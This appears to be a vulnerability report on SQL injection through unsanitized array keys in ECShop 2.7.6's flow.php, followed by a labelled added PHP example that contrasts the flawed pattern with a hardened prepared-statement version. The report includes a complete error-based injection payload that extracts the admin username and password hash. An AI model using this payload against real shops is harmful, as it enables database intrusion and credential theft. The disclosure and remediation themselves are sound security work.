ecshop 2.7.6 flow.php
src:
https://github.com/shopex/ecshop/blob/master/upload/flow.php
flow_update_cart($_POST['goods_number']);
so:

Used to make the value an int, but forgot to do the same with the key vars, so this leads to SQL injection.
Hackers can do this like:
goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1] = value
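
The pattern this report describes (array value cast to int, array key left untouched), shown beside a hardened form. This is an added example, not ECShop's code and not part of the original report; the table and column names (`cart`, `rec_id`, `goods_number`) and both function names are assumptions for illustration.

```php
<?php
// Added example, not ECShop code. Schema and function names are hypothetical.

// Vulnerable shape: the value is cast, the array key is interpolated as-is.
function build_update_unsafe(array $goods_number): array
{
    $queries = [];
    foreach ($goods_number as $key => $val) {
        $val = intval($val); // value is sanitized, $key is not
        $queries[] = "UPDATE cart SET goods_number = $val WHERE rec_id = '$key'";
    }
    return $queries;
}

// Hardened shape: validate key and value as integers, then bind both.
function update_cart_safe(PDO $db, array $goods_number): int
{
    $stmt = $db->prepare('UPDATE cart SET goods_number = :n WHERE rec_id = :id');
    $updated = 0;
    foreach ($goods_number as $key => $val) {
        $id = filter_var($key, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        $n  = filter_var($val, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
        if ($id === false || $n === false) {
            continue; // drop entries whose key or value is not a plain integer
        }
        $stmt->execute([':n' => $n, ':id' => $id]);
        $updated += $stmt->rowCount();
    }
    return $updated;
}

// Constructed sample input: one legitimate key and one key carrying a quote.
$post = ['12' => '3', "12' OR '1'='1" => '5'];

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cart (rec_id INTEGER PRIMARY KEY, goods_number INTEGER)');
$db->exec('INSERT INTO cart VALUES (12, 1), (13, 1)');

// The second unsafe query shows the key closing the quoted literal.
print_r(build_update_unsafe($post));
// The safe path updates only the row addressed by the integer key.
echo update_cart_safe($db, $post), " row(s) updated\n";
```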